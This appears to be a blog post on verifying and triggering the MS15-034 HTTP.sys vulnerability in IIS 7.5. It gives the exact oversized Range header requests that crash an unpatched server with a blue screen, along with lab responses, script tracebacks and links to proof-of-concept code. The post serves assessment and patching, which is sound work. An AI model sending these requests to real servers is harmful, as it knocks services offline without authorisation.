To trigger the vulnerability request a resource which must be present on the IIS web server, say default files (welcome.png, iisstart.htm etc.)
Original PoC was posted on Pastebin
http://pastebin.com/raw.php?i=ypURDPc4
You can verify if Kernel-mode Caching is enabled (which is enabled by default) or not.
If IIS Manager is installed follow below steps.
IIS Manager -> Default Web Site -> Output Caching ->double click -> Edit Feature Settings (on top right)
To add Cache Rule, click on Add link on top right (no required though)
We can verify http parameters using command line(CLI).
I successfully tested and observed BSoD on Windows 7 SP1 IIS 7.5, default installation.
Following range header didn't lead to crash in my case.
Range: bytes=0-18446744073709551615
but
Range: bytes=18-18446744073709551615
will definitely lead to DoS, single HTTP request didn't lead to DoS in my tests. We have to atleast make 2 or 3 HTTP requests.
Auditing/Assessing IIS using script available on pastebin
Request
GET / HTTP/1.1
Host: 192.168.56.110
Range: bytes=0-18446744073709551615
Response
HTTP/1.1 416 Requested Range Not Satisfiable
Content-Type: text/html
Last-Modified: Tue, 02 Dec 2014 05:52:00 GMT
Accept-Ranges: bytes
ETag: "a0495b17f4dd01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Fri, 17 Apr 2015 06:51:08 GMT
Content-Length: 362
Content-Range: bytes */689
[!!] Looks VULN
Error message "HTTP Error 416. The requested range is not satisfiable" indicates the IIS Web Server is Vulnerable.
Even if we request with valid resource(welcome.png) and range 0-18446744073709551615 we get response shown above with 416 status code but doesn't see BSoD or unresponsiveness.
GET /welcome.png HTTP/1.1
Blue Screen of Death
We can see a connection reset, junk response or no response from IIS server(will lead to multiple duplicate requests) indicating unresponsiveness or BSoD. Lets look at Wireshark traces showing these scenarios.
Connection Reset from IIS Server
GET /welcome.png HTTP/1.1
Host: 192.168.56.110
Range: bytes=18-18446744073709551615
Traceback (most recent call last):
File "./ms15_034.py", line 27, in
goodResp = client_socket.recv(1024)
socket.error: [Errno 104] Connection reset by peer
Junk Response (partial content)
This type of response will definitely lead to BSoD.
HTTP/1.1 206 Partial Content
Content-Type: image/png
Last-Modified: Tue, 02 Dec 2014 05:52:00 GMT
Accept-Ranges: bytes
ETag: "30df5f17f4dd01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
?$? ?3s? ? ???$?h$z? B?Content-Range: bytes 18-429
No response from IIS Server (duplicate requests)
GET /welcome.png HTTP/1.1
Host: 192.168.56.110
Range: bytes=18-18446744073709551615
Successful attack will lead to BSoD, following are the error messages which I observed
IRQL_NOT_LESS_OR_EQUAL
PAGE_FAULT_IN_NONPAGED_AREA
We will see following error message once the Server comes up after recovering from BSoD.
No authentication required to trigger BSoD, Patch Immediately!!!
For more details
https://github.com/rapid7/metasploit-framework/pull/5150
https://isc.sans.edu/forums/diary/MS15034+HTTPsys+IIS+DoS+And+Possible+Remote+Code+Execution+PATCH+NOW/19583/
No comments:
Post a Comment